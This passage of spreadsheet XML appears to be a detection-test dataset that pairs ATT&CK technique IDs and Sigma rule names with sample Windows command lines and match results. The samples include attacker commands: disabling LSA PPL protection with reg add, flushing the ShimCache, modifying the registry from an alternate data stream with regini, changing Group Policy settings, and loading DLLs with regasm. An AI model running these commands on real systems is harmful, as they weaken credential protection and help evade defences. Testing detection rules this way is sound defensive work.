          <t>Imports Registry Key From an ADS (0b80ade5-6997-4b1d-99a1-71701778ea61); Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J2990" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2990" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2991" ht="15.75" customHeight="1" s="42">
      <c r="A2991" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2991" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regini_ads</t>
        </is>
      </c>
      <c r="C2991" s="43" t="inlineStr">
        <is>
          <t>Suspicious Registry Modification From ADS Via Regini.EXE</t>
        </is>
      </c>
      <c r="D2991" s="43" t="inlineStr">
        <is>
          <t>77946e79-97f1-45a2-84b4-f37b5c0d8682</t>
        </is>
      </c>
      <c r="E2991" s="43" t="inlineStr">
        <is>
          <t>regini.exe "C:\path\to\folder\ :script.txt"</t>
        </is>
      </c>
      <c r="F2991" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2991" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2991" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2991" s="43" t="inlineStr">
        <is>
          <t>Suspicious Registry Modification From ADS Via Regini.EXE (77946e79-97f1-45a2-84b4-f37b5c0d8682)</t>
        </is>
      </c>
      <c r="J2991" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2991" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2992" ht="15.75" customHeight="1" s="42">
      <c r="A2992" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2992" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regini_ads</t>
        </is>
      </c>
      <c r="C2992" s="43" t="inlineStr">
        <is>
          <t>Suspicious Registry Modification From ADS Via Regini.EXE</t>
        </is>
      </c>
      <c r="D2992" s="43" t="inlineStr">
        <is>
          <t>77946e79-97f1-45a2-84b4-f37b5c0d8682</t>
        </is>
      </c>
      <c r="E2992" s="43" t="inlineStr">
        <is>
          <t>regini.exe C:\path\to\folder\ :script.txt</t>
        </is>
      </c>
      <c r="F2992" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2992" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2992" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2992" s="43" t="inlineStr">
        <is>
          <t>Suspicious Registry Modification From ADS Via Regini.EXE (77946e79-97f1-45a2-84b4-f37b5c0d8682)</t>
        </is>
      </c>
      <c r="J2992" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2992" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2993" ht="15.75" customHeight="1" s="42">
      <c r="A2993" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2993" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C2993" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D2993" s="43" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E2993" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c Rundll32.exe apphelp.dll,ShimFlushCache</t>
        </is>
      </c>
      <c r="F2993" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2993" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2993" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2993" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e); ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e)</t>
        </is>
      </c>
      <c r="J2993" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2993" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2994" ht="15.75" customHeight="1" s="42">
      <c r="A2994" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2994" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C2994" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D2994" s="43" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E2994" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "Rundll32.exe" apphelp.dll,ShimFlushCache</t>
        </is>
      </c>
      <c r="F2994" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2994" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2994" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2994" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e); ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e)</t>
        </is>
      </c>
      <c r="J2994" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2994" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2995" ht="15.75" customHeight="1" s="42">
      <c r="A2995" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2995" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C2995" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D2995" s="43" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E2995" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c Rundll32.exe apphelp.dll,ShimFlushCache # comment</t>
        </is>
      </c>
      <c r="F2995" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2995" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2995" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2995" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e); ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e)</t>
        </is>
      </c>
      <c r="J2995" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2995" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2996" ht="15.75" customHeight="1" s="42">
      <c r="A2996" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2996" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C2996" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D2996" s="43" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E2996" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c Rundll32.exe apphelp.dll,ShimFlushCache #250</t>
        </is>
      </c>
      <c r="F2996" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2996" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2996" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2996" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e); ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e)</t>
        </is>
      </c>
      <c r="J2996" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2996" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2997" ht="15.75" customHeight="1" s="42">
      <c r="A2997" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2997" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C2997" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D2997" s="43" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E2997" s="43" t="inlineStr">
        <is>
          <t>Rundll32.exe apphelp.dll,ShimFlushCache</t>
        </is>
      </c>
      <c r="F2997" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2997" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2997" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2997" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e); ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e)</t>
        </is>
      </c>
      <c r="J2997" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2997" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2998" ht="15.75" customHeight="1" s="42">
      <c r="A2998" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2998" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C2998" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D2998" s="43" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E2998" s="43" t="inlineStr">
        <is>
          <t>Rundll32.exe apphelp.dll,ShimFlushCache #46</t>
        </is>
      </c>
      <c r="F2998" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2998" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2998" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2998" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e); ShimCache Flush (b0524451-19af-4efa-a46f-562a977f792e)</t>
        </is>
      </c>
      <c r="J2998" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2998" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2999" ht="15.75" customHeight="1" s="42">
      <c r="A2999" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2999" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C2999" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D2999" s="43" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E2999" s="43" t="inlineStr">
        <is>
          <t>rundll32 apphelp.dll,#+250</t>
        </is>
      </c>
      <c r="F2999" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2999" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2999" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2999" s="43" t="inlineStr">
        <is>
          <t>Potential Obfuscated Ordinal Call Via Rundll32 (43fa5350-db63-4b8f-9a01-789a427074e1); Potential Obfuscated Ordinal Call Via Rundll32 (43fa5350-db63-4b8f-9a01-789a427074e1)</t>
        </is>
      </c>
      <c r="J2999" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2999" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3000" ht="15.75" customHeight="1" s="42">
      <c r="A3000" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3000" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_runonce_execution</t>
        </is>
      </c>
      <c r="C3000" s="43" t="inlineStr">
        <is>
          <t>Run Once Task Execution as Configured in Registry</t>
        </is>
      </c>
      <c r="D3000" s="43" t="inlineStr">
        <is>
          <t>198effb6-6c98-4d0c-9ea3-451fa143c45c</t>
        </is>
      </c>
      <c r="E3000" s="43" t="inlineStr">
        <is>
          <t>runonce.exe /AlternateShellStartup</t>
        </is>
      </c>
      <c r="F3000" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3000" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3000" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3000" s="43" t="inlineStr">
        <is>
          <t>Run Once Task Execution as Configured in Registry (198effb6-6c98-4d0c-9ea3-451fa143c45c)</t>
        </is>
      </c>
      <c r="J3000" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3000" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3001" ht="15.75" customHeight="1" s="42">
      <c r="A3001" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3001" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_runonce_execution</t>
        </is>
      </c>
      <c r="C3001" s="43" t="inlineStr">
        <is>
          <t>Run Once Task Execution as Configured in Registry</t>
        </is>
      </c>
      <c r="D3001" s="43" t="inlineStr">
        <is>
          <t>198effb6-6c98-4d0c-9ea3-451fa143c45c</t>
        </is>
      </c>
      <c r="E3001" s="43" t="inlineStr">
        <is>
          <t>runonce.exe /AlternateShellStartup /r</t>
        </is>
      </c>
      <c r="F3001" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3001" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3001" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3001" s="43" t="inlineStr">
        <is>
          <t>Run Once Task Execution as Configured in Registry (198effb6-6c98-4d0c-9ea3-451fa143c45c)</t>
        </is>
      </c>
      <c r="J3001" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3001" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3002" ht="15.75" customHeight="1" s="42">
      <c r="A3002" s="43" t="inlineStr">
        <is>
          <t>t1562.010</t>
        </is>
      </c>
      <c r="B3002" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_lsa_ppl_protection_disabled</t>
        </is>
      </c>
      <c r="C3002" s="43" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D3002" s="43" t="inlineStr">
        <is>
          <t>8c0eca51-0f88-4db2-9183-fdfb10c703f9</t>
        </is>
      </c>
      <c r="E3002" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /d 0 /f</t>
        </is>
      </c>
      <c r="F3002" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3002" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3002" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3002" s="43" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE (8c0eca51-0f88-4db2-9183-fdfb10c703f9)</t>
        </is>
      </c>
      <c r="J3002" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3002" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3003" ht="15.75" customHeight="1" s="42">
      <c r="A3003" s="43" t="inlineStr">
        <is>
          <t>t1562.010</t>
        </is>
      </c>
      <c r="B3003" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_lsa_ppl_protection_disabled</t>
        </is>
      </c>
      <c r="C3003" s="43" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D3003" s="43" t="inlineStr">
        <is>
          <t>8c0eca51-0f88-4db2-9183-fdfb10c703f9</t>
        </is>
      </c>
      <c r="E3003" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /d 0x0 /f</t>
        </is>
      </c>
      <c r="F3003" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3003" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3003" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3003" s="43" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE (8c0eca51-0f88-4db2-9183-fdfb10c703f9)</t>
        </is>
      </c>
      <c r="J3003" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3003" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3004" ht="15.75" customHeight="1" s="42">
      <c r="A3004" s="43" t="inlineStr">
        <is>
          <t>t1562.010</t>
        </is>
      </c>
      <c r="B3004" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_lsa_ppl_protection_disabled</t>
        </is>
      </c>
      <c r="C3004" s="43" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D3004" s="43" t="inlineStr">
        <is>
          <t>8c0eca51-0f88-4db2-9183-fdfb10c703f9</t>
        </is>
      </c>
      <c r="E3004" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /f /v RunAsPPL /d 0</t>
        </is>
      </c>
      <c r="F3004" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3004" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3004" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3004" s="43" t="inlineStr">
        <is>
          <t>LSA PPL Protection Disabled Via Reg.EXE (8c0eca51-0f88-4db2-9183-fdfb10c703f9)</t>
        </is>
      </c>
      <c r="J3004" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3004" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3005" ht="15.75" customHeight="1" s="42">
      <c r="A3005" s="43" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B3005" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C3005" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D3005" s="43" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E3005" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F3005" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3005" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3005" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3005" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings (ada4b0c4-758b-46ac-9033-9004613a150d)</t>
        </is>
      </c>
      <c r="J3005" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3005" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3006" ht="15.75" customHeight="1" s="42">
      <c r="A3006" s="43" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B3006" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C3006" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D3006" s="43" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E3006" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F3006" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3006" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3006" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3006" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings (ada4b0c4-758b-46ac-9033-9004613a150d)</t>
        </is>
      </c>
      <c r="J3006" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3006" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3007" ht="15.75" customHeight="1" s="42">
      <c r="A3007" s="43" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B3007" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C3007" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D3007" s="43" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E3007" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v ShellSmartScreenLevel /t REG_SZ /d Block /f</t>
        </is>
      </c>
      <c r="F3007" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3007" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3007" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3007" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings (ada4b0c4-758b-46ac-9033-9004613a150d)</t>
        </is>
      </c>
      <c r="J3007" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3007" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3008" ht="15.75" customHeight="1" s="42">
      <c r="A3008" s="43" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B3008" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C3008" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D3008" s="43" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E3008" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKLM\S^OFTWARE\Policies\Microsoft\Windows\System /v GroupPolicyRefreshTime /t REG_DWORD /d 10 /f</t>
        </is>
      </c>
      <c r="F3008" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3008" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3008" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3008" s="43" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings (ada4b0c4-758b-46ac-9033-9004613a150d)</t>
        </is>
      </c>
      <c r="J3008" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3008" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3009" ht="15.75" customHeight="1" s="42">
      <c r="A3009" s="43" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B3009" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_regsvcs_uncommon_location_execution</t>
        </is>
      </c>
      <c r="C3009" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location</t>
        </is>
      </c>
      <c r="D3009" s="43" t="inlineStr">
        <is>
          <t>cc368ed0-2411-45dc-a222-510ace303cb2</t>
        </is>
      </c>
      <c r="E3009" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U C:\Users\thaim\AppData\Local\Temp\T1218.009.dll</t>
        </is>
      </c>
      <c r="F3009" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3009" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3009" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3009" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location (cc368ed0-2411-45dc-a222-510ace303cb2)</t>
        </is>
      </c>
      <c r="J3009" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3009" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3010" ht="15.75" customHeight="1" s="42">
      <c r="A3010" s="43" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B3010" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_regsvcs_uncommon_location_execution</t>
        </is>
      </c>
      <c r="C3010" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location</t>
        </is>
      </c>
      <c r="D3010" s="43" t="inlineStr">
        <is>
          <t>cc368ed0-2411-45dc-a222-510ace303cb2</t>
        </is>
      </c>
      <c r="E3010" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe  /U C:\Users\thaim\AppData\Local\Temp\T1218.009.dll</t>
        </is>
      </c>
      <c r="F3010" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3010" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3010" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3010" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location (cc368ed0-2411-45dc-a222-510ace303cb2)</t>
        </is>
      </c>
      <c r="J3010" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3010" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3011" ht="15.75" customHeight="1" s="42">
      <c r="A3011" s="43" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B3011" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_regsvcs_uncommon_location_execution</t>
        </is>
      </c>
      <c r="C3011" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location</t>
        </is>
      </c>
      <c r="D3011" s="43" t="inlineStr">
        <is>
          <t>cc368ed0-2411-45dc-a222-510ace303cb2</t>
        </is>
      </c>
      <c r="E3011" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe -U C:\Users\thaim\AppData\Local\Temp\T1218.009.dll</t>
        </is>
      </c>
      <c r="F3011" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3011" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3011" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3011" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location (cc368ed0-2411-45dc-a222-510ace303cb2)</t>
        </is>
      </c>
      <c r="J3011" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3011" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3012" ht="15.75" customHeight="1" s="42">
      <c r="A3012" s="43" t="inlineStr">
        <is>
          <t>t1574</t>
        </is>
      </c>
      <c r="B3012" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_cimprovider_dll_load</t>
        </is>
      </c>
      <c r="C3012" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe</t>
        </is>
      </c>
      <c r="D3012" s="43" t="inlineStr">
        <is>
          <t>a2910908-e86f-4687-aeba-76a5f996e652</t>
        </is>
      </c>
      <c r="E3012" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\SysWow64\Register-CimProvider.exe -Path "C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll"</t>
        </is>
      </c>
      <c r="F3012" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3012" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3012" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3012" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe (a2910908-e86f-4687-aeba-76a5f996e652)</t>
        </is>
      </c>
      <c r="J3012" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3012" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3013" ht="15.75" customHeight="1" s="42">
      <c r="A3013" s="43" t="inlineStr">
        <is>
          <t>t1574</t>
        </is>
      </c>
      <c r="B3013" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_cimprovider_dll_load</t>
        </is>
      </c>
      <c r="C3013" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe</t>
        </is>
      </c>
      <c r="D3013" s="43" t="inlineStr">
        <is>
          <t>a2910908-e86f-4687-aeba-76a5f996e652</t>
        </is>
      </c>
      <c r="E3013" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\SysWow64\Register-CimProvider.exe -Path " C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll "</t>
        </is>
      </c>
      <c r="F3013" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3013" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3013" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3013" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe (a2910908-e86f-4687-aeba-76a5f996e652)</t>
        </is>
      </c>
      <c r="J3013" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3013" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3014" ht="15.75" customHeight="1" s="42">
      <c r="A3014" s="43" t="inlineStr">
        <is>
          <t>t1574</t>
        </is>
      </c>
      <c r="B3014" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_cimprovider_dll_load</t>
        </is>
      </c>
      <c r="C3014" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe</t>
        </is>
      </c>
      <c r="D3014" s="43" t="inlineStr">
        <is>
          <t>a2910908-e86f-4687-aeba-76a5f996e652</t>
        </is>
      </c>
      <c r="E3014" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\SysWow64\Register-CimProvider.exe -Path 'C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll'</t>
        </is>
      </c>
      <c r="F3014" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3014" s="43" t="b">
